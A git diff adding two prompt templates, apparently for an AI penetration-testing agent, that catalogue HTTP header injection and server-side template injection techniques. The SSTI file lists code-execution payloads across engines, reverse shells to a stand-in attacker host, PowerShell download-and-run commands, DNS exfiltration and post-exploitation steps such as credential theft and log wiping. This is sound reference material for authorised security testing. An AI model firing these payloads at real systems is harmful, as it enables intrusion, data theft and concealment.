diff --git a/strix/prompts/vulnerabilities/header_injection.jinja b/strix/prompts/vulnerabilities/header_injection.jinja
new file mode 100644
index 00000000..3e6993de
--- /dev/null
+++ b/strix/prompts/vulnerabilities/header_injection.jinja
@@ -0,0 +1,238 @@
+
+HTTP HEADER INJECTION
+
+Header injection enables response splitting, cache poisoning, session fixation, authentication bypass, and distributed attacks across proxies and caches. Treat every server-controlled header value as untrusted input until normalized and validated. User influence on response headers is as dangerous as code injection.
+
+
+- Response header injection (Set-Cookie, Location, Content-Type, X-* custom headers)
+- Request header manipulation (Host, X-Forwarded-*, User-Agent, Referer, Accept-Language, Authorization)
+- Proxy/cache confusion via multiple header techniques
+- CRLF injection enabling response splitting and smuggling
+- HTTP/2 pseudo-header attacks
+- Header parsing differentials across servers, proxies, and clients
+- Log poisoning and security bypass via log-based detection evasion
+
+
+
+1. Inventory all server-controlled headers influenced by user input: redirects, cookies, content-type, content-disposition, custom X-* headers, error messages, rate-limit headers.
+2. Test normalization: attempt newline injection (\n, \r, %0a, %0d, %0d%0a, URL-encoded variants, Unicode whitespace), null bytes, multi-byte sequences.
+3. Establish a baseline response with a known payload; compare status, headers, body, caching directives, and intermediary behavior.
+4. Probe parser differentials: same payload via different transports (HTTP/1.0, HTTP/1.1, HTTP/2, chunked encoding), case variance, leading/trailing whitespace.
+5. Test multi-stage injection: injection site in query string vs body vs header, with secondary reflection into another header.
+
+
+
+
+- Redirect endpoints (next, return, continue, goto, url, redirect_uri, referer echo)
+- User-visible errors and custom error pages (user input echoed in HTTP 404/500 responses)
+- File download endpoints (Content-Disposition filename, Content-Type inference from user input)
+- API response headers (X-Page-Count, X-Total-Results, X-Query-Time derived from user input)
+- Cache headers (Cache-Control, ETag, Last-Modified computed from user-supplied values)
+- Authentication/session headers (Set-Cookie with user-derived domain, path, or value; WWW-Authenticate realm)
+- Custom logging or tracking headers (X-Request-Id containing user input, X-Correlation-Id, X-User-Id)
+- Webhook/callback URLs (Host, Referer, User-Agent in requests made by server)
+- Rate-limit or quota headers (X-RateLimit-Remaining, X-RateLimit-Reset influenced by user)
+- Proxy headers (X-Forwarded-For, X-Forwarded-Proto, X-Real-IP intended for trusted proxies but injectable)
+
+
+
+- Bare LF: %0a, 0x0a, \n
+- Bare CR: %0d, 0x0d, \r
+- CRLF: %0d%0a, %0a%0d, 0x0d0x0a, \r\n, \n\r
+- Double encoding: %250d%250a, %252f%252e%252e
+- Overlong UTF-8: %c0%8d%c0%8a (Cyrillic/overlong representations of control chars)
+- Unicode line/paragraph separators: %e2%80%a8 (U+2028), %e2%80%a9 (U+2029)
+- Mixed case: %0D%0A, %0a%0d
+- Null termination: %00, trailing NUL coercing parser stop
+- Mixed separators: %0a%0d%0a (LF CR LF), multiple separators to confuse parsers
+
+
+
+- HTTP/1.0 vs HTTP/1.1: message framing rules differ (presence of Content-Length vs Transfer-Encoding)
+- Chunked transfer encoding: chunk delimiters followed by injected headers
+- Multipart boundaries: CRLF after boundary resets parser state in some implementations
+- HTTP/2 pseudo-header injection (:method, :path, :authority, :scheme) via header values
+- Header field parsing: tolerance for leading/trailing whitespace, case insensitivity, multiple values
+- Method override: X-HTTP-Method-Override, X-Method-Override respected by some frameworks
+- Host header handling: Host vs X-Forwarded-Host precedence; port inclusion; IPv6 format confusion
+- Server-side template evaluation of headers: header value processed through template engine
+
+
+
+- Multiple Content-Length headers: server vs proxy pick different one, leading to request smuggling
+- Whitespace encoding: header-name: %20value vs header-name:%20value vs header-name : value
+- Folding: RFC 2822 header folding (continuation lines) in HTTP context: deprecated but parsed differently across servers
+- Tab injection: %09, often treated as whitespace or field separator, permitting header injections
+- Null byte truncation: header-value\x00injected-header causes null termination in some parsers
+- Case mangling: Header-Name vs header-name vs HEADER-NAME; cache key differs
+- Leading dot or colon: .header-name, :header-name parsed inconsistently
+
+
+
+- Vary headers: inspect Vary, Via, X-Cache, X-Powered-By to infer caching layer and server
+- Server response headers: Server, X-AspNet-Version, X-Served-By, CF-Ray (Cloudflare), X-Amzn-RequestId (AWS)
+- Error pages: custom 404/500 with server version or tech stack hints
+- Timing: response time deltas revealing caching behavior or backend processing
+- Response length: same request → different lengths suggesting header injection serialized
+- ETag changes: injected headers in response change cache key/ETag calculation
+
+
+
+
+
+- Injected header appears in response (Set-Cookie, Location, X-Custom, etc.)
+- Secondary request receives injected value (cookie set, redirect followed, etc.)
+
+
+
+- Inject CRLF + empty line + attacker content; response parser treats attacker content as new response
+- Observable via proxy/cache: two requests yield two responses, or cache returns injected response to unrelated request
+
+
+
+- Inject cache-busting payload: manipulate Vary, Cache-Control, ETag; secondary request from different user hits poisoned cache
+- Observe via timing: first request slow, second request fast (cache hit with injected content)
+- Test across proxy boundaries: Burp, mitmproxy, or real CDN caching injected payload
+
+
+
+- Set-Cookie injection: inject Domain, Path, Secure, HttpOnly, SameSite, Max-Age attributes
+- Session identifier hijacking: inject SameSite=None + Secure to enable cross-site cookie theft
+- Observe: browser sends injected cookie on subsequent same-origin requests; cross-site requests if SameSite=None
+
+
+
+- Host header injection: modify Host header or inject via user input reflected into response Host header
+- Observe: password reset emails sent to attacker.com, CDN maps to attacker origin, OAuth redirects to attacker
+- Compare responses: same path with different Host headers yields different content or redirects
+
+
+
+- Authorization header manipulation: inject bearer tokens, Basic auth, API keys into request or response
+- Observe: unauthorized request succeeds after header injection; elevated privileges; different user accessed
+
+
+
+- Response time deltas reveal header processing: injected header with computation (regex, database lookup) vs simple header
+- Retry-After header with large delay causing client-side pause
+- Set-Cookie with future expiry vs past expiry affecting session state timing
+
+
+
+- Blind XXE/SSRF via injected Referer/User-Agent in webhook/logging sent to attacker server
+- Open Redirect via Location header injection; client follows attacker-controlled URL
+- DNS exfiltration via data encoded in Host/X-Forwarded-Host header parsed by logging/proxy infrastructure
+
+
+
+
+
+- Inject CRLF to terminate current response and begin new response under attacker control
+- Payload: {% raw %}injectionpoint\r\n\r\n{% endraw %}
+- Proxy/cache sees two responses; if cache key includes only first line, poisoned cache returns attacker response
+- HTTP/2 servers may reject CRLF in header values (stricter parsing), but some intermediaries or backends accept
+- Request smuggling via header injection: inject Content-Length header conflicting with Transfer-Encoding; proxy and backend parse differently
+
+
+
+- Vary header manipulation: Vary: Accept-Encoding injected → cache segregates by encoding not content
+- X-Forwarded-* injection: X-Forwarded-Proto: https injected into HTTPS request; if cache key includes, HTTP requests hit HTTPS cache
+- Age/Max-Age injection: set to 0 for cache bypass, or huge value for persistent poisoning
+- Cache-Control: public injected into private responses, or private injected into public → cache behavior flip
+- Etag collision: inject ETag matching another resource → conditional requests return wrong resource
+- Set-Cookie for cache key: if cache includes cookies, inject Set-Cookie → cache entries segregate by attacker-chosen value
+
+
+
+- Domain/Path bypass: inject Domain=.attacker.com or Path=/ to widen cookie scope
+- HttpOnly bypass: if Set-Cookie lacks HttpOnly, injected cookie accessible to JavaScript
+- SameSite bypass: inject SameSite=None; Secure flag required but if HTTPS, enables cross-site cookie inclusion
+- Secure flag bypass: inject Secure to force cookie over HTTPS only; if site has mixed HTTP/HTTPS, cookie inaccessible on HTTP
+- Max-Age manipulation: inject Max-Age=-1 to immediately expire all cookies, or Max-Age=999999999 for persistent cookie
+- Cookie jar collision: inject cookie with same name/domain/path as legitimate cookie → precedence determines which is sent
+
+
+
+- Location header injection: Redirect endpoint echoes user input into Location header; inject CRLF + new Location pointing to attacker
+- Authorization header reflection: endpoints reflecting Authorization header in error responses; inject Authorization header via user input
+- WWW-Authenticate header injection: inject custom realm or parameter; client-side password managers may store injected credentials
+- Refresh header injection: inject Refresh: 0; url=attacker.com for JavaScript-free redirect
+- X-Accel-Redirect header injection (Nginx): inject X-Accel-Redirect: /etc/passwd to serve internal files (if not properly validated)
+
+
+
+- X-Forwarded-For spoofing: inject X-Forwarded-For: 127.0.0.1 to bypass IP-based rate limiting or auth
+- X-Forwarded-Proto injection: inject X-Forwarded-Proto: https to SSL-only validation even on HTTP connection
+- X-Forwarded-Host injection: inject Host header or X-Forwarded-Host to cause password reset/OAuth tokens sent to attacker domain
+- X-Real-IP injection: Nginx/Apache reverse proxy trusts X-Real-IP; inject attacker IP for logging bypass
+- Forwarded header injection (RFC 7239): similar to X-Forwarded-*, but standardized; inject attacker IP/host
+- Client-IP / CF-Connecting-IP injection: CloudFlare and others trust these headers; inject attacker IP
+
+
+
+- Content-Type injection: inject Content-Type: text/html into response served as application/json; browser sniffs and renders HTML → XSS
+- Content-Encoding injection: inject Content-Encoding: gzip without actual gzip compression; browser fails to decompress, revealing raw content
+- X-Content-Type-Options bypass: inject X-Content-Type-Options: nosniff into response; if server respects, then inject Content-Type for sniffing
+- Charset injection: inject Content-Type: text/html; charset=utf-7; UTF-7 decoding may enable XSS via alternative encoding
+- Content-Disposition abuse: inject Content-Disposition: inline for script execution, or attachment with executable extension
+
+
+
+- Location header XSS: inject Location: javascript:alert(1) or data:text/html,
+- Set-Cookie with embedded script (if cookie processed as HTML): Set-Cookie: xss=
+- X-Original-URL reflection: some apps reflect X-Original-URL in headers; inject XSS payload
+- Referer header echo: if Referer echoed in error page via header, inject Referer: ">
+- User-Agent or other request headers echoed into response headers or body → CRLF inject for splitting
+
+
+
+- Inject request headers that appear in access logs; attacker reads logs and runs commands
+- Inject CRLF + fake log entries to obfuscate attack in logs
+- Inject headers to defeat WAF: split payload across multiple headers, mix encodings, use header case variants
+- X-Client-IP, X-Forwarded-For injection to spoof source IP in firewall logs
+- User-Agent injection: inject malicious User-Agent to poison honeypot logs or SIEM correlation
+
+
+
+- Location header: inject Location: https://attacker.com directly if header user-controlled
+- Refresh header: inject Refresh: 0; url=attacker.com
+- Content-Location header (less common but still processed): inject Content-Location: https://attacker.com
+- Link header with rel=next or rel=shortlink to attacker
+- From header (uncommon) in specific protocols
+
+
+
+- Host header as DNS oracle: inject Host: attacker.tld; if logging or proxying includes Host resolution, DNS exfiltration possible
+- X-Forwarded-Host DNS: similar to Host, if proxied service resolves header value
+- Timing via Retry-After: server honors Retry-After header; inject large delay to affect client behavior
+- Connection header abuse: inject Connection: close to close connection prematurely, or Connection: keep-alive to affect pipelining
+
+
+
+- Pseudo-header injection: :method, :path, :authority, :scheme are pseudo-headers in HTTP/2; some implementations allow injection via header values
+- Header name normalization: HTTP/2 lowercases header names; inject using uppercase to bypass case-sensitive filters in HTTP/1.1 downgrade
+- Continuation frame splitting: HEADERS frames with CONTINUATION frames; inject across frame boundaries
+
+
+
+- Proxy → backend mismatch: HTTP/1.1 proxy to HTTP/2 backend (or vice versa); same payload parsed as different requests
+- Chunked vs Content-Length confusion: proxy sees chunked, backend sees Content-Length; request body interpretation differs
+- Forwarded vs X-Forwarded-* precedence: if both present, different servers prioritize different one; inject via less-trusted header
+- Case sensitivity in header names: some systems case-insensitive, others not; inject via case variant to evade filters
+
+
+
+
+- Password reset and account recovery flows (Set-Cookie, Location, email headers)
+- OAuth/SSO redirect endpoints (Location, Host header determines authorization server destination)
+- Rate limiting and quota systems (X-RateLimit-* headers injected to bypass limits)
+- API authentication (Authorization header, X-API-Key manipulation)
+- Payment gateways and financial transactions (Location redirects, Set-Cookie for session fixation)
+- Admin panels and internal tools (Host header confusion, X-Forwarded-* bypasses)
+- CDN and WAF bypass (cache poisoning, header smuggling to evade detection)
+- Multi-tenant isolation (Host header, X-Tenant-Id injection to cross tenant boundaries)
+- Logging and monitoring bypass (X-Forwarded-For spoofing, User-Agent poisoning)
+- Email systems (Injecting headers into notification/alert emails sent by server)
+
+
+
diff --git a/strix/prompts/vulnerabilities/server_side_template_injection.jinja b/strix/prompts/vulnerabilities/server_side_template_injection.jinja
new file mode 100644
index 00000000..543491dd
--- /dev/null
+++ b/strix/prompts/vulnerabilities/server_side_template_injection.jinja
@@ -0,0 +1,226 @@
+
+SERVER-SIDE TEMPLATE INJECTION (SSTI)
+
+SSTI occurs when user input reaches template engines without sanitization, enabling expression evaluation, object traversal, and code execution. Modern engines are complex: subtle syntax differences, filter chains, and gadget availability differ across Jinja/Mako/Velocity/Smarty/Freemarker/Thymeleaf/Handlebars/EJS/ERB/Haml. Treat every user-controlled rendering as code execution until proven isolated.
+
+
+- Web/API endpoints rendering templates with dynamic input (emails, PDFs, HTML, reports)
+- Template languages: Jinja2/Jinja, Mako, Velocity, Smarty, Freemarker, Thymeleaf, Handlebars, EJS, ERB, Haml, Twig, Nunjucks, Marko, Dust
+- CMS/static site generators and their theme engines
+- No-code/low-code platforms with user-supplied templates
+- Microtemplate injections in smaller DSLs and expression languages
+- YAML/TOML/JSON deserialization triggering template evaluation
+
+
+
+1. Identify injection points: user input in template rendering paths (email subjects/bodies, report headers, documentation, theme customization, dynamic HTML fragments, API response formatting).
+2. Establish context: which template engine, version, config (autoescape, filters, imports, globals), sandboxing. Compare error messages and timing between payloads.
+3. Start with blind probes: mathematical expressions ({% raw %}{{7*7}}{% endraw %}, {% raw %}<%= 3+4 %>{% endraw %}, ${7*7}) and string concatenation to differentiate template syntax.
+4. Escalate to object/attribute access ({% raw %}{{self}}{% endraw %}, {% raw %}{{request.application}}{% endraw %}, {% raw %}<%= system %>{% endraw %}) and method invocation.
+5. Chain to RCE: gadget chains, subprocess access, file operations, environment variable exfiltration. Validate on multiple instances and configs.
+
+
+
+
+- Form fields, query strings, headers (User-Agent, Referer, X-* custom), cookies, JSON bodies, GraphQL variables
+- File uploads (filename, metadata processed through template), email/SMS fields (to, subject, body, template selection)
+- API response formatting (pagination strings, filter expressions, aggregation labels, report titles)
+- Configuration/theme endpoints (CSS/JS generation, HTML exports, webhook templates, notification formats)
+- Hidden fields in responses (X-Template, X-Engine headers, HTML comments with engine hints, JavaScript frameworks detecting template syntax)
+
+
+
+- Math: {% raw %}{{7*7}}{% endraw %}, {% raw %}${7*7}{% endraw %}, {% raw %}<%= 7*7 %>{% endraw %}, {% raw %}<%=7*7%>{% endraw %}, {{7*7}}, [=7*7=], <% 7*7 %>, #{7*7}
+- String concat: {% raw %}{{7*'7'}}{% endraw %}, {% raw %}${7*'7'}{% endraw %}, {% raw %}<%= 7*'7' %>{% endraw %}, {7*'7'}, [7*'7']
+- Reflection: {% raw %}{{self}}{% endraw %}, {% raw %}${self}{% endraw %}, {% raw %}<%= self %>{% endraw %}, {{ app }}, {{ env }}
+- Delays: {% raw %}{{7*7}}|default:sleep(5){% endraw %}, {% raw %}${Runtime.getRuntime().exec('sleep 5')}{% endraw %}, <% system('sleep 5') %>
+
+
+
+- Numeric: confirmed via length change, ETag diff, or response delay match
+- String: output appears verbatim or in predictable location (response body, error page, email preview)
+- Error-based: exception names, stack frames, template directive syntax revealed
+- Timing: secondary coercion or loop to introduce measurable latency
+- Header injection: injected into Set-Cookie, Location, Content-Disposition via template variable
+
+
+
+- Syntax diff tests: {% raw %}{{var}}{% endraw %} vs <%= var %> vs ${var} vs [=var=] vs {%var%}
+- Filter syntax: pipe (|), colon (:), space, semicolon
+- Loop/block syntax: {% raw %}{% for %}{% endraw %} vs <% for %> vs [% for %]
+- Comment markers: {# #}, <%# %>, /**/
+- Error messages: version string, engine name, file path, context variables leaked
+- Response headers: X-Template-Engine, X-Renderer, Server variant
+- Performance/timing deltas between similar payloads (cached vs fresh template compile)
+
+
+
+
+
+- Expression result rendered inline (visible in response body, email, PDF)
+- Modified HTML structure detectable via diff/MutationObserver
+
+
+
+- Coerce syntax/type errors leaking context, stack trace, engine version, accessible objects
+- Invalid filter/function names → list of available filters
+- Object traversal errors revealing parent scope hierarchy
+
+
+
+- Loops: {% raw %}{%for i in range(1000000)%}{%endfor%}{% endraw %}, ${#set($x=0)}<% (0..1000000).each {$x++} %>
+- Sleep: {% raw %}{{self.__init__.__globals__.__builtins__.__import__('time').sleep(5)}}{% endraw %}, <%= `sleep 5` %>, ${T(java.lang.Runtime).getRuntime().exec('sleep 5')}
+- Recursive traversal of deep object chains
+- Heavy computation: regex backtracking, string operations on huge strings
+
+
+
+- DNS exfiltration via {% raw %}{{self.__init__.__globals__.__builtins__.__import__('socket').gethostbyname('$(whoami).attacker.tld')}}{% endraw %} or equivalent per engine
+- HTTP callback via template fetching external URL or command execution piped to curl
+- Blind gadget chain confirmation via response length/ETag diff when side-effect triggers
+
+
+
+
+
+- Object/attribute traversal: {% raw %}{{self}}{% endraw %}, {% raw %}{{self.__dict__}}{% endraw %}, {% raw %}{{self.__init__.__globals__}}{% endraw %}
+- Builtin access: {% raw %}{{self.__init__.__globals__.__builtins__}}{% endraw %}, {% raw %}{{cycler.__init__.__globals__.os.popen('id').read()}}{% endraw %}
+- {% raw %}{{'__import__'.__class__.__mro__[1].__subclasses__()}}{% endraw %} to enumerate all classes → locate subprocess/popen/open
+- Filter chains: {% raw %}{{ payload|string|replace('x','y') }}{% endraw %} → filter composition for payload mutation
+- Namespace pollution: {% raw %}{% for x in y.__dict__ %}{% endraw %} to leak attributes when iteration supported
+- Macro nesting and recursion for computational gadgets
+- Safe string wrappers bypass: {% raw %}{{Markup(dangerous)}}{% endraw %}, {% raw %}{{value|safe}}{% endraw %} if autoescape disabled
+
+
+
+- Silent null-deref for blind enumeration: ${obj.method()}, #set($x = $obj.method())
+- Class access: ${{}}, ${''.class}, ${Class.forName('java.lang.Runtime')}, #set($rt = $Runtime.getRuntime())
+- Method invocation chain: ${Runtime.getRuntime().exec('id')}
+- Built-in variables: ${.version}, ${.data_model}, ${.globals}
+- Macro definition for loop-based gadget chains: #macro(brute)#foreach($c in $rt)...#end#end
+
+
+
+- Ruby code eval: <%= system('id') %>, <% exec('bash -c "..."') %>, <% `command` %>
+- Object access: <%= self.class %>, <%= Object.constants %>, <%= Gem.loaded_specs %>
+- Require/load: <%= require('socket'); TCPSocket.new(...) %>
+- Unsafe string interpolation: #{"#{7*7}"}
+
+
+
+- Smarty: {php}$_POST['x']{/php}, {assign var=x value=$smarty.server.PHP_SELF}, {$smarty.ldelim}{$smarty.rdelim}
+- Twig: {{ _self }}, {{ self }}, {{ cycles }}, {% raw %}{% macro test() %}{% endmacro %}{% endraw %}
+- PHP filter chains: {{ string|replace|reverse|upper }}, passing payloads through multiple filters
+- Namespace traversal: Smarty plugin auto-load via template path, Twig Environment extension loading
+
+
+
+- SpEL (Spring Expression Language): ${T(java.lang.Runtime).getRuntime().exec('id')}
+- Thymeleaf-specific variables: [[${#string.abbreviate(text,17)}]], /*[[${payload}]]*/
+- Inline expressions: [[${{payload}}]], [(${payload})]
+- Attribute modification: th:text="${T(java.lang.Runtime).getRuntime().exec('touch /tmp/pwned')}"
+- Conditional expressions with method chaining: [# th:if="${T(java.lang.System).getProperty('os.name')}"]
+
+
+
+- Handlebars: {{this}}, {{this.constructor}}, {{#each @root}} iteration over globals
+- Nunjucks: {{ foo() }}, {% raw %}{% set x = cycler.__init__.__globals__ %}{% endraw %}, filter composition
+- EJS: <%= process.env.FLAG %>, <% eval(Buffer.from(b64,'base64').toString()) %>
+- Built-in object leakage: <%= Object.keys(this) %>, {{ Object.getOwnPropertyNames(Function.prototype) }}
+
+
+
+- YAML template engines: !!python/object/apply:os.system ["id"]
+- TOML embedded expressions if parser supports evaluation
+- JSON post-processing through template → inject via value interpolation
+- Polyglot injection: JSON string containing template syntax evaluated downstream
+
+
+
+- Multi-engine contexts: template output fed to second engine; craft payload valid for both
+- Format string → template: printf-style format strings evaluated as template expressions
+- Markdown/reStructuredText with embedded template/code block syntax
+- SVG/HTML templating: namespace confusion between template tags and HTML/SVG elements
+
+
+
+- Encoding layering: URL → JSON → template, or template → HTML-encoded → browser decode → JS eval
+- Case and whitespace: {% raw %}{{7*7}}{% endraw %} vs {{7 *7}} vs {{ 7*7 }} vs {{7*7}}
+- Comment stripping vs evaluation: injection before/after template comment parsing
+- Directive reordering: {% raw %}{% set x=1 %}{% endraw %} vs inline vs post-evaluation
+- Filter/function aliasing: same function via different names or namespace collisions
+- Operator precedence abuse: ((7*7)), 7 * 7, 7*7, 7 **7
+- Null byte injection: {{ x%00y }}, terminating template processing early
+- Unicode normalization: смарт-кавычки (smart quotes) vs ASCII quotes confusing parsers
+- Variable shadowing: injection of reserved keywords or locals that override globals
+
+
+
+- Enumerate all accessible classes: {% raw %}{%for c in [].constructor.__init__.__globals__.values()%}{%if c.__name__=='__loader__'%}{{c.__self__}}{%endif%}{%endfor%}{% endraw %}
+- Process/subprocess gadgets: Runtime, ProcessBuilder, exec, system, backticks, %x{}, system(), popen()
+- File I/O gadgets: open(), fopen(), file_get_contents(), readFile(), File.read()
+- Network gadgets: socket, HTTP client, curl, wget, nc
+- Reflection gadgets: Class.forName(), getClass(), .__class__, constructor.prototype
+- Serialization/deserialization gadgets: ObjectInputStream, pickle, deserialize()
+- Import/require gadgets: __import__(), require(), include, load, exec(), eval()
+
+
+
+- Deleted builtins restoration: {% raw %}{{[].__class__.__base__.__subclasses__()}}{% endraw %} to walk inheritance
+- Whitelist bypass: inject via attribute lookup instead of direct function reference
+- Implicit conversion: coerce object to string/number/boolean triggering __str__/__tostring__ with injected code
+- Iterator protocol: __iter__, __next__ abused for code execution during iteration
+- Context manager protocol: __enter__, __exit__ invoked during with block evaluation
+- Descriptor protocol: __get__, __set__, __delete__ triggered on attribute access
+- Metaclass abuse: __new__, __init__ invoked during class instantiation
+- Module introspection: sys.modules, importlib to load arbitrary code
+- Bytecode injection: compile() and exec()/eval() with crafted bytecode
+
+
+
+
+- Single-liner shells: /bin/bash -c, /bin/sh, Perl one-liner, Python -c, Ruby -e, Node.js -e
+- Command substitution: $(cmd), `cmd`, {% raw %}{{os.popen('id').read()}}{% endraw %}
+- Pipeline and redirection: | tee /tmp/x, && next_cmd, || fallback
+- Reverse shell: bash -i >& /dev/tcp/attacker.ip/port 0>&1, nc attacker.ip port -e /bin/bash
+- Alternative shells: /bin/ksh, /bin/tcsh, /bin/zsh
+- Kernel exploits via template gadgets accessing /proc/sys
+
+
+
+- CMD: cmd /c command, cmd /C "command", for /l %i in (1,1,5) do command
+- PowerShell: powershell -Command "code", pwsh -c {code}, powershell -enc [Base64], IEX (New-Object Net.WebClient).DownloadString('url')
+- Windows API via .NET (Thymeleaf/SpEL context): Process.Start, System.Diagnostics.Process
+- Scheduled task abuse: schtasks /create, at command (deprecated but sometimes present)
+
+
+
+- Direct subprocess: java.lang.Runtime, ProcessBuilder, System.exec(), os.spawn, fork+exec
+- Interpreted evaluation: eval(), exec(), system(), popen()
+- File write + inclusion: write web shell to webroot, then trigger inclusion/access
+- Template function definition: define function inline that executes code on next invocation
+- Unsafe deserialization chains: pickle, Java serialization, PHP unserialize()
+
+
+
+
+- Environment variable extraction: env, environ, getenv, System.getenv
+- File system reconnaissance: ls, dir, find, Get-ChildItem, file permissions, /proc/self/status
+- Network access and lateral movement: curl/wget to internal services, DNS resolution of internal hosts
+- Persistence mechanisms: cron jobs, scheduled tasks, service creation, SSH key installation, web shell
+- Credential extraction: /etc/passwd, /etc/shadow (if readable), .ssh/authorized_keys, cloud metadata services
+- Log and evidence removal: rm, del, Clear-EventLog, history -c
+
+
+
+- Email rendering engines and bulk mailers (template in TO/FROM/SUBJECT/BODY)
+- PDF generators and report engines (server-side template rendering pre-conversion)
+- CMS theme/plugin systems with user-supplied templates
+- API response formatting and schema rendering
+- Webhook payload templating and notification systems
+- Code generation tools and build pipeline templates
+- Search result templating and faceted search rendering
+- Admin panels with template editing or preview functionality
+
+
+